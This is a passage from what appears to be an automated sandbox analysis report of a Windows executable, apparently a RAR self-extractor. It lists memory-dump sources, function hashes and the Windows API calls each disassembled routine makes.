                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a35e7adce06e08ef698c26d317750609a1cd5fa430d8b692c75e486cfe404af5
                • Instruction ID: 0a743bd63cae9f452a09c86a6734c00c35a1bbbfdbb6e06d7664852cc8d4b6a8
                • Opcode Fuzzy Hash: a35e7adce06e08ef698c26d317750609a1cd5fa430d8b692c75e486cfe404af5
                • Instruction Fuzzy Hash: 35819F9121E6E8AEC7069F7D38F42F53FA15777300B1988ABC4C686363D13A465CE722
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cbe8e4e576fa38d226be095172567abeccb09db77ad412ffb8742c3b72e1474f
                • Instruction ID: 044e1f7837bf82f6521c27de8842aaec66b0875243d14f52331031848be5f5b2
                • Opcode Fuzzy Hash: cbe8e4e576fa38d226be095172567abeccb09db77ad412ffb8742c3b72e1474f
                • Instruction Fuzzy Hash: A251D0705093D24FC712EF2691A44AFBFE0BE9A318F59489FE4D54B303D224D64ACB96
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7b3ad8225e74179b075b18f8a4fae7f3fcc2062d6fa10d876ab3429995f74cca
                • Instruction ID: f1df1ee0eaa12db20463e28ce205114fa20bdbb935262f5df87b1f45dd1af3e2
                • Opcode Fuzzy Hash: 7b3ad8225e74179b075b18f8a4fae7f3fcc2062d6fa10d876ab3429995f74cca
                • Instruction Fuzzy Hash: A0512671A083018FC748CF19D49055AF7E1FF88354F058A2EE899A7740DB34E959CB9A
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                • Instruction ID: e48585389b504e8514fab628f63b3142bcdaaa6fab636a14fef914cc6be60b60
                • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                • Instruction Fuzzy Hash: A131D3B16047468FCB14DF29C86126BBBE0FB95306F10492FE495C7342C739EA59CB96
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dbfd12ce1f23c964d972f646fe384a98a38d76e00fa2fb74ac412ea7d413a859
                • Instruction ID: 90a211209957efabb4428f530132de3ca20d145496361b93c9d98ec4602f2821
                • Opcode Fuzzy Hash: dbfd12ce1f23c964d972f646fe384a98a38d76e00fa2fb74ac412ea7d413a859
                • Instruction Fuzzy Hash: BC212932A201254BCB48CF2DDCE087B7755A79A311746812FFE42CB3D1C538E928DBA0
                APIs
                • _swprintf.LIBCMT ref: 004DDABE
                  • Part of subcall function 004D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004D401D
                  • Part of subcall function 004E1596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00510EE8,00000200,004DD202,00000000,?,00000050,00510EE8), ref: 004E15B3
                • _strlen.LIBCMT ref: 004DDADF
                • SetDlgItemTextW.USER32(?,0050E154,?), ref: 004DDB3F
                • GetWindowRect.USER32(?,?), ref: 004DDB79
                • GetClientRect.USER32(?,?), ref: 004DDB85
                • GetWindowLongW.USER32(?,000000F0), ref: 004DDC25
                • GetWindowRect.USER32(?,?), ref: 004DDC52
                • SetWindowTextW.USER32(?,?), ref: 004DDC95
                • GetSystemMetrics.USER32(00000008), ref: 004DDC9D
                • GetWindow.USER32(?,00000005), ref: 004DDCA8
                • GetWindowRect.USER32(00000000,?), ref: 004DDCD5
                • GetWindow.USER32(00000000,00000002), ref: 004DDD47
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Similarity
                • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                • String ID: $%s:$CAPTION$TP$d
                • API String ID: 2407758923-2858895526
                APIs
                • ___free_lconv_mon.LIBCMT ref: 004FC277
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBE2F
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBE41
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBE53
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBE65
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBE77
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBE89
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBE9B
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBEAD
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBEBF
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBED1
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBEE3
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBEF5
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBF07
                • _free.LIBCMT ref: 004FC26C
                  • Part of subcall function 004F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,004FBFA7,?,00000000,?,00000000,?,004FBFCE,?,00000007,?,?,004FC3CB,?), ref: 004F84F4
                  • Part of subcall function 004F84DE: GetLastError.KERNEL32(?,?,004FBFA7,?,00000000,?,00000000,?,004FBFCE,?,00000007,?,?,004FC3CB,?,?), ref: 004F8506
                • _free.LIBCMT ref: 004FC28E
                • _free.LIBCMT ref: 004FC2A3
                • _free.LIBCMT ref: 004FC2AE
                • _free.LIBCMT ref: 004FC2D0
                • _free.LIBCMT ref: 004FC2E3
                • _free.LIBCMT ref: 004FC2F1
                • _free.LIBCMT ref: 004FC2FC
                • _free.LIBCMT ref: 004FC334
                • _free.LIBCMT ref: 004FC33B
                • _free.LIBCMT ref: 004FC358
                • _free.LIBCMT ref: 004FC370
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID: PP
                • API String ID: 161543041-2217693588
                APIs
                • GetWindow.USER32(?,00000005), ref: 004ECD51
                • GetClassNameW.USER32(00000000,?,00000800), ref: 004ECD7D
                  • Part of subcall function 004E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,004DBB05,00000000,.exe,?,?,00000800,?,?,004E85DF,?), ref: 004E17C2
                • GetWindowLongW.USER32(00000000,000000F0), ref: 004ECD99
                • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 004ECDB0
                • GetObjectW.GDI32(00000000,00000018,?), ref: 004ECDC4
                • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 004ECDED
                • DeleteObject.GDI32(00000000), ref: 004ECDF4
                • GetWindow.USER32(00000000,00000002), ref: 004ECDFD
                Similarity
                • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                • String ID: STATIC
                • API String ID: 3820355801-1882779555
                APIs
                • _free.LIBCMT ref: 004F8EC5
                  • Part of subcall function 004F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,004FBFA7,?,00000000,?,00000000,?,004FBFCE,?,00000007,?,?,004FC3CB,?), ref: 004F84F4
                  • Part of subcall function 004F84DE: GetLastError.KERNEL32(?,?,004FBFA7,?,00000000,?,00000000,?,004FBFCE,?,00000007,?,?,004FC3CB,?,?), ref: 004F8506
                • _free.LIBCMT ref: 004F8ED1
                • _free.LIBCMT ref: 004F8EDC
                • _free.LIBCMT ref: 004F8EE7
                • _free.LIBCMT ref: 004F8EF2
                • _free.LIBCMT ref: 004F8EFD
                • _free.LIBCMT ref: 004F8F08
                • _free.LIBCMT ref: 004F8F13
                • _free.LIBCMT ref: 004F8F1E
                • _free.LIBCMT ref: 004F8F2C
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                Similarity
                • API ID:
                • String ID: ;%u$x%u$xc%u
                • API String ID: 0-2277559157
                APIs
                  • Part of subcall function 004D130B: GetDlgItem.USER32(00000000,00003021), ref: 004D134F
                  • Part of subcall function 004D130B: SetWindowTextW.USER32(00000000,005035B4), ref: 004D1365
                • EndDialog.USER32(?,00000001), ref: 004EAD20
                • SendMessageW.USER32(?,00000080,00000001,?), ref: 004EAD47
                • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 004EAD60
                • SetWindowTextW.USER32(?,?), ref: 004EAD71
                • GetDlgItem.USER32(?,00000065), ref: 004EAD7A
                • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 004EAD8E
                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 004EADA4
                Similarity
                • API ID: MessageSend$Item$TextWindow$Dialog
                • String ID: LICENSEDLG
                • API String ID: 3214253823-2177901306
                APIs
                • __EH_prolog.LIBCMT ref: 004D9448
                • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 004D946B
                • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 004D948A
                  • Part of subcall function 004E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,004DBB05,00000000,.exe,?,?,00000800,?,?,004E85DF,?), ref: 004E17C2
                • _swprintf.LIBCMT ref: 004D9526
                  • Part of subcall function 004D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004D401D
                • MoveFileW.KERNEL32(?,?), ref: 004D9595
                • MoveFileW.KERNEL32(?,?), ref: 004D95D5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                • String ID: rtmp%d
                • API String ID: 2111052971-3303766350
                • Opcode ID: 07c46e8ed86b259a3cf225c5a23c6e21fe94e1828d2e2e1d03568cb1c8a527bc
                • Instruction ID: 6ba96846438b68e4a619d21ccac74908031f5127e39bc7aaf94152e69bfe06ea
                • Opcode Fuzzy Hash: 07c46e8ed86b259a3cf225c5a23c6e21fe94e1828d2e2e1d03568cb1c8a527bc
                • Instruction Fuzzy Hash: 2E416F71900158B6CB30EB61CCA5ADF737CEF11784F0444ABB549E3241EB389F898BA8
                APIs
                • GlobalAlloc.KERNEL32(00000040,?), ref: 004E8F38
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 004E8F59
                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 004E8F80
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Global$AllocByteCharCreateMultiStreamWide
                • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                • API String ID: 4094277203-4209811716
                • Opcode ID: be176102130abdbaa7106c562b4c9b6e36203731cfde999f4cc88a9061af5877
                • Instruction ID: fff6b9993723b3ce35e7acad0aa859a3c35ab604369a597b43660301f8f8d9e2
                • Opcode Fuzzy Hash: be176102130abdbaa7106c562b4c9b6e36203731cfde999f4cc88a9061af5877
                • Instruction Fuzzy Hash: A0314A315083557BDB10AB369C42FAF7B98EF91725F04011FFA05A62C1EF6C9909C3A9
                APIs
                • GetLastError.KERNEL32(?,00510EE8,004F3E14,00510EE8,?,?,004F3713,00000050,?,00510EE8,00000200), ref: 004F8FA9
                • _free.LIBCMT ref: 004F8FDC
                • _free.LIBCMT ref: 004F9004
                • SetLastError.KERNEL32(00000000,?,00510EE8,00000200), ref: 004F9011
                • SetLastError.KERNEL32(00000000,?,00510EE8,00000200), ref: 004F901D
                • _abort.LIBCMT ref: 004F9023
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ErrorLast$_free$_abort
                • String ID: XP
                • API String ID: 3160817290-3026131541
                • Opcode ID: fd612b66466b894f79017848a343cc4f5e17f29e6f7d06136ed6232d33c9d08e
                • Instruction ID: 0c1e1be806a8cfd35f071f099b104a802afa6de0a6ac6e576d1367963d0e8a7d
                • Opcode Fuzzy Hash: fd612b66466b894f79017848a343cc4f5e17f29e6f7d06136ed6232d33c9d08e
                • Instruction Fuzzy Hash: 05F0F436505A097FC31133267C0AB3F2A1A9BE1764F34011FF715DA292EE2C8D02642D
                APIs
                • __aulldiv.LIBCMT ref: 004E0A9D
                  • Part of subcall function 004DACF5: GetVersionExW.KERNEL32(?), ref: 004DAD1A
                • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 004E0AC0
                • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 004E0AD2
                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 004E0AE3
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 004E0AF3
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 004E0B03
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 004E0B3D
                • __aullrem.LIBCMT ref: 004E0BCB
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                • String ID:
                • API String ID: 1247370737-0
                • Opcode ID: 2d54bd609c0a46f8522e9d69cdbfa66cc5afc2285661e4cf67ea3e0ddffd8c7c
                • Instruction ID: bf077ec8484ee407dcad51975b986eb4ef42288a886170130dcc33ccdd3fa090
                • Opcode Fuzzy Hash: 2d54bd609c0a46f8522e9d69cdbfa66cc5afc2285661e4cf67ea3e0ddffd8c7c
                • Instruction Fuzzy Hash: 4D413AB14083059FC310DF65C88496BB7F8FB88715F00492FF59692650E778E648CB55
                APIs
                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,004FF5A2,?,00000000,?,00000000,00000000), ref: 004FEE6F
                • __fassign.LIBCMT ref: 004FEEEA
                • __fassign.LIBCMT ref: 004FEF05
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 004FEF2B
                • WriteFile.KERNEL32(?,?,00000000,004FF5A2,00000000,?,?,?,?,?,?,?,?,?,004FF5A2,?), ref: 004FEF4A
                • WriteFile.KERNEL32(?,?,00000001,004FF5A2,00000000,?,?,?,?,?,?,?,?,?,004FF5A2,?), ref: 004FEF83
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: 1133944b2ce2f6c30efd9f8ee248c4861c40339087e550b412b93eaf887f7d77
                • Instruction ID: 99b78a8eedeb3839e7e08fda36d2dde66e97b78096eb54b6b45f19c4dacdb19e
                • Opcode Fuzzy Hash: 1133944b2ce2f6c30efd9f8ee248c4861c40339087e550b412b93eaf887f7d77
                • Instruction Fuzzy Hash: 1E51D571A00209AFCB10CFAADC45AFEBBF9EF19301F14411BEA51E72A1D7349A41CB64
                APIs
                • GetTempPathW.KERNEL32(00000800,?), ref: 004EC54A
                • _swprintf.LIBCMT ref: 004EC57E
                  • Part of subcall function 004D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004D401D
                • SetDlgItemTextW.USER32(?,00000066,0051946A), ref: 004EC59E
                • _wcschr.LIBVCRUNTIME ref: 004EC5D1
                • EndDialog.USER32(?,00000001), ref: 004EC6B2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                • String ID: %s%s%u
                • API String ID: 2892007947-1360425832
                • Opcode ID: b743fb9ac6b49fd9a15b74e3a6c0f91ee27727d2f369d879551de089011b4545
                • Instruction ID: 6c1868766bb0be154323ca1d4febde8ef6baaeb96d56518a9c794702fe542dce
                • Opcode Fuzzy Hash: b743fb9ac6b49fd9a15b74e3a6c0f91ee27727d2f369d879551de089011b4545
                • Instruction Fuzzy Hash: D641B371D00658AADF26DBA1CC85FEB77BCAB18306F0040A7E509D61A0E7799AC9CB54
                APIs
                • ShowWindow.USER32(?,00000000), ref: 004E964E
                • GetWindowRect.USER32(?,00000000), ref: 004E9693
                • ShowWindow.USER32(?,00000005,00000000), ref: 004E972A
                • SetWindowTextW.USER32(?,00000000), ref: 004E9732
                • ShowWindow.USER32(00000000,00000005), ref: 004E9748
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Window$Show$RectText
                • String ID: RarHtmlClassName
                • API String ID: 3937224194-1658105358
                • Opcode ID: 643f9fee4f434dda482601dcc0830ff3a7514750d52ba79406ba3790d19dfcbe
                • Instruction ID: c4b4ba54f83c496dd036ac2b1895238b9e89f8414652da9be8e4a04a39b80b47
                • Opcode Fuzzy Hash: 643f9fee4f434dda482601dcc0830ff3a7514750d52ba79406ba3790d19dfcbe
                • Instruction Fuzzy Hash: 9E31E331404254EFCB519F66DD48B6B7BA8FF48702F00855AFE499A392CB38DC09DB69
                APIs
                  • Part of subcall function 004FBF79: _free.LIBCMT ref: 004FBFA2
                • _free.LIBCMT ref: 004FC003
                  • Part of subcall function 004F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,004FBFA7,?,00000000,?,00000000,?,004FBFCE,?,00000007,?,?,004FC3CB,?), ref: 004F84F4
                  • Part of subcall function 004F84DE: GetLastError.KERNEL32(?,?,004FBFA7,?,00000000,?,00000000,?,004FBFCE,?,00000007,?,?,004FC3CB,?,?), ref: 004F8506
                • _free.LIBCMT ref: 004FC00E
                • _free.LIBCMT ref: 004FC019
                • _free.LIBCMT ref: 004FC06D
                • _free.LIBCMT ref: 004FC078
                • _free.LIBCMT ref: 004FC083
                • _free.LIBCMT ref: 004FC08E
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                • Instruction ID: c042b09d659738e772df385f09c839cfb0b3569c83f6ee3b9ced5ab167f97275
                • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                • Instruction Fuzzy Hash: F111217154070DF6D620B7B1CC06FE7B79DAF01704F40881E7799AA552DB69F9048AE4
                APIs
                • GetLastError.KERNEL32(?,?,004F20C1,004EFB12), ref: 004F20D8
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004F20E6
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004F20FF
                • SetLastError.KERNEL32(00000000,?,004F20C1,004EFB12), ref: 004F2151
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
